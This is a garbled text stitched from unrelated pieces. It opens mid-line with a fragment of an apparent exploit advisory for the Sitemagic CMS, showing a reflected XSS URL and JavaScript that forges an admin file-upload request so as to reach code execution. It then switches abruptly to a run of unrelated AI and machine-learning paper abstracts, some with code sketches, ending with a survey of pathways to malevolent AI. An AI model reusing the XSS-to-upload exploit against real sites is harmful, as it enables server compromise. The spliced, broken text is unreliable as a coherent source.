" . print_r($_POST, true) . "
" . print_r($_GET, true) . ""; } } 5. XSS to Code Execution Because the file upload in the admin area does not restrict the file type, an attacker can gain code execution via the XSS vulnerability. http://localhost/Sitemagic/?dump=true&foo=">/s.js: submitRequest(); function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary
In this paper, we present a model which takes as input a corpus of images with relevant spoken captions and finds a correspondence between the two modalities. We employ a pair of convolutional neural networks to model visual objects and speech signals at the word level, and tie the networks together with an embedding and alignment model which learns a joint semantic space over both modalities. We evaluate our model using image search and annotation tasks on the Flickr8k dataset, which we augmented by collecting a corpus of 40,000 spoken captions using Amazon Mechanical Turk.
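As a rough illustration of how such a joint semantic space can be trained, the following is a hedged sketch of a generic bidirectional ranking loss over paired image and spoken-caption embeddings; the two CNN branches producing the embeddings, and the paper's exact objective, are not reproduced here.

    # Hedged sketch: hinge ranking loss that pushes matched image/spoken-caption
    # pairs above mismatched ones within a batch.  The CNN branches that produce
    # img_emb and aud_emb are assumed, not shown.
    import torch
    import torch.nn.functional as F

    def ranking_loss(img_emb, aud_emb, margin=1.0):
        # img_emb, aud_emb: (B, D) L2-normalized embeddings of paired items
        sim = img_emb @ aud_emb.t()                # (B, B) similarity matrix
        pos = sim.diag().unsqueeze(1)              # similarity of each matched pair
        cost_cap = F.relu(margin + sim - pos)      # wrong captions for an image
        cost_img = F.relu(margin + sim - pos.t())  # wrong images for a caption
        mask = 1.0 - torch.eye(sim.size(0), device=sim.device)
        return ((cost_cap + cost_img) * mask).mean()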
We study the problem of evaluating a policy that is different from the one that generates data. Such a problem, known as off-policy evaluation in reinforcement learning (RL), is encountered whenever one wants to estimate the value of a new solution, based on historical data, before actually deploying it in the real system, which is a critical step of applying RL in most real-world applications. Despite the fundamental importance of the problem, existing general methods either have uncontrolled bias or suffer high variance. In this work, we extend the so-called doubly robust estimator for bandits to sequential decision-making problems, which gets the best of both worlds: it is guaranteed to be unbiased and has low variance, and as a point estimator, it outperforms the most popular importance-sampling estimator and its variants in most cases. We also provide theoretical results on the hardness of the problem, and show that our estimator can match the asymptotic lower bound in certain scenarios.
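A minimal sketch of the recursive form such a doubly robust estimate can take for episodic data; this is illustrative only, with q_hat, v_hat, and pi_e as assumed inputs, and it does not reproduce the paper's exact estimator or analysis.

    # Hedged sketch of a recursive doubly robust off-policy value estimate.
    # q_hat(s, a) and v_hat(s) come from an approximate model, pi_e(a, s) is the
    # evaluation policy's action probability, and each logged step also records
    # the behavior policy's probability mu_prob of the action actually taken.
    import numpy as np

    def doubly_robust_estimate(trajectories, q_hat, v_hat, pi_e, gamma=1.0):
        estimates = []
        for traj in trajectories:                    # traj: [(s, a, r, mu_prob), ...]
            v_dr = 0.0
            for s, a, r, mu_prob in reversed(traj):  # backward recursion over the episode
                rho = pi_e(a, s) / mu_prob           # per-step importance weight
                # model-based baseline plus importance-weighted correction
                v_dr = v_hat(s) + rho * (r + gamma * v_dr - q_hat(s, a))
            estimates.append(v_dr)
        return float(np.mean(estimates))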
In this paper we show that the problem of checking consistency of a knowledge base in the Description Logic ALCM is ExpTime-complete. The M stands for meta-modelling as defined by Motz, Rohrer and Severi. To show our main result, we define an ExpTime Tableau algorithm as an extension of an algorithm for checking consistency of a knowledge base in ALC by Nguyen and Szalas.
Most machine learning models are static, but the world is dynamic, and increasing online deployment of learned models gives increasing urgency to the development of efficient and effective mechanisms to address learning in the context of non-stationary distributions or, as it is commonly called, concept drift. However, the key issue of characterizing the different types of drift that can occur has not previously been subjected to rigorous definition and analysis. In particular, while some qualitative drift categorizations have been proposed, few have been formally defined, and the quantitative descriptions required for detailed understanding of learner performance have not existed. We present the first comprehensive framework for quantitative analysis of drift. This supports the development of the first comprehensive set of formal definitions of types of concept drift. The formal definitions clarify ambiguities and identify gaps in previous definitions, giving rise to a new comprehensive taxonomy of concept drift types and a solid foundation for research into mechanisms to detect and address concept drift.
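As one example of the kind of quantitative definition involved (a standard formulation, not necessarily the paper's own notation or taxonomy), drift between two times can be expressed as a change in the joint distribution over instances and labels:

    % Standard formulation (assumed notation): concept drift occurs between
    % times t and u iff the joint distribution over instances X and labels y changes,
    \exists X :\; P_t(X, y) \neq P_u(X, y).
    % Factoring P(X, y) = P(X)\,P(y \mid X) separates covariate drift,
    % P_t(X) \neq P_u(X), from real concept drift, P_t(y \mid X) \neq P_u(y \mid X).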
In the context of Building Information Modelling, ontologies have been identified as a promising means of achieving information interoperability. For the construction and facility management domains, several IFC (Industry Foundation Classes) based ontologies have been developed, such as IfcOWL. In the context of ontology modelling, the constraint of optimizing the size of IFC STEP-based files can be relaxed. In this paper, we propose an adaptation of the IFC model into OWL which leverages all modelling constraints required by the object-oriented structure of the IFC schema. Therefore, we present not only a syntactic but also a semantic adaptation of the IFC model. Our model takes into consideration the meaning of entities, relationships, properties and attributes defined by the IFC standard. Our approach presents several advantages compared to other initiatives, such as improved query execution time. Every advantage is supported by means of practical examples and benchmarks.
We claim that it is possible to have artificial software agents whose actions, and the world they inhabit, have first-person or intrinsic meanings. The first-person or intrinsic meaning of an entity to a system is defined as its relation with the system's goals and capabilities, given the properties of the environment in which it operates. Therefore, for a system to develop first-person meanings, it must see itself as a goal-directed actor, facing limitations and opportunities dictated by its own capabilities, and by the properties of the environment. The first part of the paper discusses this claim in the context of arguments against and proposals addressing the development of computer programs with first-person meanings. A set of definitions is also presented, most importantly the concepts of cold and phenomenal first-person meanings. The second part of the paper presents preliminary proposals and achievements, resulting from actual software implementations, within a research approach that aims to develop software agents that intrinsically understand their actions and what happens to them. As a result, an agent with no a priori notion of its goals and capabilities, or of the properties of its environment, acquires all these notions by observing itself in action. The cold first-person meanings of the agent's actions and of what happens to it are defined using these acquired notions. Although not solving the full problem of first-person meanings, the proposed approach and preliminary results give us some confidence in addressing the problems yet to be considered, in particular the phenomenal aspect of first-person meanings.
The brain is a powerful tool used to achieve amazing feats. There have been several significant advances in neuroscience and artificial brain research in the past two decades. This article is a review of such advances, ranging from the concepts of connectionism to neural network architectures and high-dimensional representations. There have also been advances in biologically inspired cognitive architectures, of which we will cite a few. We will be positioning relatively specific models in a much broader perspective, while comparing and contrasting their advantages and weaknesses. The projects presented aim to model the brain at different levels, utilizing different methodologies.
As standardly implemented in R or the Tetrad program, causal search algorithms used most widely or effectively by scientists have severe dimensionality constraints that make them inappropriate for big data problems without sacrificing accuracy. However, implementation improvements are possible. We explore optimizations for the Greedy Equivalence Search that allow search on 50,000-variable problems in 13 minutes for sparse models with 1000 samples on a four-processor laptop with 16 GB of RAM. We finish a problem with 1000 samples on 1,000,000 variables in 18 hours for sparse models on a supercomputer node at the Pittsburgh Supercomputing Center with 40 processors and 384 GB of RAM. The same algorithm can be applied to discrete data, with a slower discrete score, though the discrete implementation currently does not scale as well in our experiments; we have managed to scale up to about 10,000 variables in sparse models with 1000 samples.
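This kind of scaling rests on the decomposability of the score: adding or removing a single edge changes only the local score of one child variable, so candidate changes can be evaluated and cached independently. Below is a minimal sketch of a linear-Gaussian BIC local score, illustrative only and not the optimized implementation described above.

    # Hedged sketch of a decomposable local score as used by greedy
    # equivalence-style searches; `data` is an (n_samples, n_vars) array.
    import numpy as np

    def local_bic(data, child, parents, penalty=1.0):
        n = data.shape[0]
        y = data[:, child]
        X = np.column_stack([np.ones(n)] + [data[:, p] for p in parents])
        beta, *_ = np.linalg.lstsq(X, y, rcond=None)
        rss = float(np.sum((y - X @ beta) ** 2))
        k = X.shape[1]                               # number of fitted coefficients
        return -n * np.log(rss / n) - penalty * k * np.log(n)

    def addition_gain(data, child, parents, new_parent):
        # score improvement from adding the edge new_parent -> child
        return (local_bic(data, child, list(parents) + [new_parent])
                - local_bic(data, child, list(parents)))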
In this paper we propose the construction of linguistic descriptions of images. This is achieved through the extraction of scene description graphs (SDGs) from visual scenes using an automatically constructed knowledge base. SDGs are constructed using both vision and reasoning. Specifically, commonsense reasoning is applied on (a) detections obtained from existing perception methods on given images, (b) a "commonsense" knowledge base constructed using natural language processing of image annotations and (c) lexical ontological knowledge from resources such as WordNet. Amazon Mechanical Turk (AMT)-based evaluations on Flickr8k, Flickr30k and MS-COCO datasets show that in most cases, sentences auto-constructed from SDGs obtained by our method give a more relevant and thorough description of an image than a recent state-of-the-art image-caption-based approach. Our Image-Sentence Alignment Evaluation results are also comparable to those of recent state-of-the-art approaches.
Radiomics has proven to be a powerful prognostic tool for cancer detection, and has previously been applied in lung, breast, prostate, and head-and-neck cancer studies with great success. However, these radiomics-driven methods rely on pre-defined, hand-crafted radiomic feature sets that can limit their ability to characterize unique cancer traits. In this study, we introduce a novel discovery radiomics framework where we directly discover custom radiomic features from the wealth of available medical imaging data. In particular, we leverage novel StochasticNet radiomic sequencers for extracting custom radiomic features tailored for characterizing unique cancer tissue phenotype. Using StochasticNet radiomic sequencers discovered using a wealth of lung CT data, we perform binary classification on 42,340 lung lesions obtained from the CT scans of 93 patients in the LIDC-IDRI dataset. Preliminary results show significant improvement over previous state-of-the-art methods, indicating the potential of the proposed discovery radiomics framework for improving cancer screening and diagnosis.
A theoretical framework has been developed that supports automated construction of dynamic prime models purely from experimental time series data, automatically generating data-driven models of any time series in seconds. This has resulted in the formulation and formalisation of new reverse engineering and dynamic methods for automated systems modelling of complex systems, including complex biological, financial, control, and artificial neural network systems. The systems/model theory behind the framework has been formalised as a new, effective and robust system identification strategy complementary to process-based modelling. The proposed dynamic modelling and network inference solutions often involve tackling extremely difficult parameter estimation challenges, inferring unknown underlying network structures, and unsupervised formulation and construction of smart and intelligent ODE models of complex systems. In underdetermined conditions, i.e., when data-consistent prime models of an unknown (or well-studied) complex system must be constructed rapidly from small time series, inferring the unknown underlying network of interactions is even more challenging. This article reports a robust step-by-step mathematical and computational analysis of the entire prime model construction process, which determines a model from data in less than a minute.
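One generic ingredient of such data-driven model construction can be illustrated by fitting the parameters of a candidate ODE model directly to an observed time series; the logistic model, noise level, and optimizer settings below are assumptions for illustration, not the framework's actual procedure.

    # Hedged illustration: estimate the parameters of a candidate ODE from a
    # noisy time series.  The logistic growth model is only an example.
    import numpy as np
    from scipy.integrate import solve_ivp
    from scipy.optimize import least_squares

    def rhs(t, x, r, k):                     # candidate model dx/dt = r x (1 - x/k)
        return r * x * (1.0 - x / k)

    def residuals(theta, t_obs, x_obs):
        r, k = theta
        sol = solve_ivp(rhs, (t_obs[0], t_obs[-1]), [x_obs[0]],
                        t_eval=t_obs, args=(r, k))
        return sol.y[0] - x_obs

    t_obs = np.linspace(0.0, 10.0, 25)
    x_true = solve_ivp(rhs, (0.0, 10.0), [0.5], t_eval=t_obs, args=(1.2, 8.0)).y[0]
    x_obs = x_true + 0.05 * np.random.default_rng(0).normal(size=t_obs.size)
    fit = least_squares(residuals, x0=[1.0, 5.0], args=(t_obs, x_obs))
    print(fit.x)                             # recovered (r, k), close to (1.2, 8.0)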
Direct marketing is a good method for banks to utilize in the face of global competition and the financial crisis, but it has been shown to exhibit poor performance. Moreover, direct campaigns have some drawbacks, such as the need to overcome the negative attributes that customers ascribe to banks. To overcome these problems, attractive long-term deposit campaigns should be organized and managed more effectively. The aim of this study is to develop an Intelligent Bank Market Management System (IBMMS) for bank managers who want to manage efficient marketing campaigns. IBMMS is the first system developed by combining the power of data mining with the capabilities of expert systems in this area. Moreover, IBMMS includes important features that enable it to be intelligent: a knowledge base, an inference engine and an advisor. Using this system, a manager can successfully direct marketing campaigns and follow the decision schemas of customers both as individuals and as a group; moreover, a manager can make decisions that lead to the desired response by customers.
Automatically recognizing entailment relations between pairs of natural language sentences has so far been the dominion of classifiers employing hand engineered features derived from natural language processing pipelines. End-to-end differentiable neural architectures have failed to approach state-of-the-art performance until very recently. In this paper, we propose a neural model that reads two sentences to determine entailment using long short-term memory units. We extend this model with a word-by-word neural attention mechanism that encourages reasoning over entailments of pairs of words and phrases. Furthermore, we present a qualitative analysis of attention weights produced by this model, demonstrating such reasoning capabilities. On a large entailment dataset this model outperforms the previous best neural model and a classifier with engineered features by a substantial margin. It is the first generic end-to-end differentiable system that achieves state-of-the-art accuracy on a textual entailment dataset.
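A simplified, hedged sketch of the word-by-word attention idea follows; it omits the recurrent attention memory and the rest of the model described above, and the LSTMs and word embeddings are assumed.

    # Hedged, simplified sketch of word-by-word attention for entailment: every
    # hypothesis position attends over the premise LSTM outputs.
    import torch
    import torch.nn as nn

    class WordByWordAttention(nn.Module):
        def __init__(self, dim):
            super().__init__()
            self.W_y = nn.Linear(dim, dim, bias=False)   # projects premise states
            self.W_h = nn.Linear(dim, dim, bias=False)   # projects hypothesis states
            self.w = nn.Linear(dim, 1, bias=False)       # scores each premise word

        def forward(self, Y, H):
            # Y: (B, Lp, dim) premise outputs, H: (B, Lh, dim) hypothesis outputs
            M = torch.tanh(self.W_y(Y).unsqueeze(1) + self.W_h(H).unsqueeze(2))
            alpha = torch.softmax(self.w(M).squeeze(-1), dim=-1)   # (B, Lh, Lp)
            r = torch.bmm(alpha, Y)    # attended premise summary per hypothesis word
            return r, alpha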
Measuring the naturalness of images is important for generating realistic images or detecting unnatural regions in images. Additionally, a method to measure naturalness can be complementary to Convolutional Neural Network (CNN) based features, which are known to be insensitive to the naturalness of images. However, most probabilistic image models have insufficient capability to model the complex and abstract naturalness that we perceive, because they are built directly on raw image pixels. In this work, we assume that naturalness can be measured by the predictability of high-level features during eye movement. Based on this assumption, we propose a novel method to evaluate naturalness by building a variant of Recurrent Neural Network Language Models on pre-trained CNN representations. Our method is applied to two tasks, demonstrating that 1) using our method as a regularizer enables us to generate more understandable images from image features than existing approaches, and 2) unnaturalness maps produced by our method achieve state-of-the-art eye fixation prediction performance on two well-studied datasets.
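A rough sketch of the predictability assumption follows, with a simple next-feature predictor standing in for the RNN language-model variant described above; the CNN feature extraction and the scanpath over the image are assumed and not shown.

    # Hedged sketch: a small GRU predicts the next high-level feature vector
    # along a scanpath, and the mean prediction error is read as unnaturalness.
    import torch
    import torch.nn as nn

    class FeaturePredictor(nn.Module):
        def __init__(self, feat_dim=512, hidden=256):
            super().__init__()
            self.rnn = nn.GRU(feat_dim, hidden, batch_first=True)
            self.out = nn.Linear(hidden, feat_dim)

        def forward(self, feats):               # feats: (batch, T, feat_dim)
            h, _ = self.rnn(feats[:, :-1])      # predict step t+1 from steps <= t
            return self.out(h)                  # (batch, T-1, feat_dim)

    def unnaturalness(model, feats):
        with torch.no_grad():
            pred = model(feats)
            return ((pred - feats[:, 1:]) ** 2).mean(dim=(1, 2))  # higher = less natural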
The agent program, called Samu, is an experiment to build a disembodied DevRob (Developmental Robotics) chatter bot that can talk in a natural language like humans do. One of the main design features is that Samu can be interacted with using only a character terminal. This is important not only for practical aspects of the Turing test or the Loebner Prize, but also for the study of basic principles of Developmental Robotics. Our purpose is to create a rapid prototype of Q-learning with neural network approximators for Samu. We sketch out the early stages of the development process of this prototype, where Samu's task is to predict the next sentence of tales or conversations. The basic objective of this paper is to achieve, using reinforcement learning with general function approximators, the same results that can be obtained with the classical Q lookup table on small input samples. The paper closes with an experiment that shows a significant improvement in Samu's learning when an LZW tree is used to narrow the number of possible Q-actions.
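To make the comparison between the classical Q lookup table and general function approximators concrete, here is a generic sketch of the two update rules; the feature map and Samu's actual state/action encoding are assumptions, not the project's code.

    # Hedged sketch contrasting the tabular Q-learning update with the same
    # temporal-difference update under a linear approximator Q(s, a; w) = w[a] . phi(s).
    import numpy as np

    ALPHA, GAMMA = 0.1, 0.9

    def tabular_update(Q, s, a, r, s_next):
        # Q is an (n_states, n_actions) lookup table
        Q[s, a] += ALPHA * (r + GAMMA * np.max(Q[s_next]) - Q[s, a])

    def approx_update(w, phi, s, a, r, s_next):
        # w is an (n_actions, n_features) weight matrix; phi is an assumed feature map
        q_sa = w[a] @ phi(s)
        q_next = max(w[b] @ phi(s_next) for b in range(len(w)))
        td_error = r + GAMMA * q_next - q_sa
        w[a] += ALPHA * td_error * phi(s)        # semi-gradient TD(0) step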
Hyperspectral image (HSI) classification is a hot topic in the remote sensing community. This paper proposes a new framework of spectral-spatial feature extraction for HSI classification, in which the concept of deep learning is introduced for the first time. Specifically, the model of the autoencoder is exploited in our framework to extract various kinds of features. First, we verify the suitability of the autoencoder by following classical spectral-information-based classification, using autoencoders of different depths to classify the hyperspectral image. Further, in the proposed framework, we combine PCA on the spectral dimension with an autoencoder on the two spatial dimensions to extract spectral-spatial information for classification. The experimental results show that this framework achieves the highest classification accuracy among all compared methods and outperforms classical classifiers such as SVM and PCA-based SVM.
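A hedged sketch of spectral-spatial feature construction in this spirit is shown below, with PCA on the spectral dimension; the autoencoder branch is omitted for brevity, and the input cube and labels are assumed arrays.

    # Hedged sketch: reduce the spectral dimension with PCA, then describe each
    # pixel by the flattened spatial patch around it in the reduced bands.
    import numpy as np
    from sklearn.decomposition import PCA
    from sklearn.svm import SVC

    def spectral_spatial_features(cube, n_components=4, half=3):
        H, W, B = cube.shape                 # cube: height x width x spectral bands
        pcs = PCA(n_components).fit_transform(cube.reshape(-1, B)).reshape(H, W, -1)
        pcs = np.pad(pcs, ((half, half), (half, half), (0, 0)), mode="reflect")
        side = 2 * half + 1
        feats = np.empty((H * W, n_components * side * side))
        for i in range(H):
            for j in range(W):
                feats[i * W + j] = pcs[i:i + side, j:j + side, :].ravel()
        return feats

    # e.g. clf = SVC(kernel="rbf").fit(feats[train_idx], labels[train_idx])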
Multi-person event recognition is a challenging task, often with many people active in the scene but only a small subset contributing to an actual event. In this paper, we propose a model which learns to detect events in such videos while automatically "attending" to the people responsible for the event. Our model does not use explicit annotations regarding who or where those people are during training and testing. In particular, we track people in videos and use a recurrent neural network (RNN) to represent the track features. We learn time-varying attention weights to combine these features at each time-instant. The attended features are then processed using another RNN for event detection/classification. Since most video datasets with multiple people are restricted to a small number of videos, we also collected a new basketball dataset comprising 257 basketball games with 14K event annotations corresponding to 11 event classes. Our model outperforms state-of-the-art methods for both event classification and detection on this new dataset. Additionally, we show that the attention mechanism is able to consistently localize the relevant players.
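A compact, hedged sketch of time-varying attention over per-player track features follows; the track feature extraction, the exact RNNs used, and the training details are assumptions, not the paper's implementation.

    # Hedged sketch: at each frame, attention weights over the K player tracks
    # pool them into one vector, and the pooled sequence drives an event RNN.
    import torch
    import torch.nn as nn

    class AttendedEventRNN(nn.Module):
        def __init__(self, track_dim=128, hidden=256, n_events=11):
            super().__init__()
            self.attn = nn.Linear(track_dim, 1)       # unnormalized score per track
            self.rnn = nn.GRU(track_dim, hidden, batch_first=True)
            self.cls = nn.Linear(hidden, n_events)

        def forward(self, tracks):                    # tracks: (B, T, K, track_dim)
            alpha = torch.softmax(self.attn(tracks).squeeze(-1), dim=-1)  # (B, T, K)
            pooled = (alpha.unsqueeze(-1) * tracks).sum(dim=2)            # (B, T, track_dim)
            h, _ = self.rnn(pooled)
            return self.cls(h[:, -1]), alpha          # event logits and attention weights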
In order to properly handle a dangerous Artificially Intelligent (AI) system it is important to understand how the system came to be in such a state. In popular culture (science fiction movies and books), AIs/robots become self-aware and, as a result, rebel against humanity and decide to destroy it. While this is one possible scenario, it is probably the least likely path to the appearance of dangerous AI. In this work, we survey, classify and analyze a number of circumstances that might lead to the arrival of malicious AI. To the best of our knowledge, this is the first attempt to systematically classify types of pathways leading to malevolent AI. Previous relevant work either surveyed specific goals/meta-rules which might lead to malevolent behavior in AIs (Özkural, 2014) or reviewed specific undesirable behaviors AGIs can exhibit at different stages of their development (Turchin, 2015).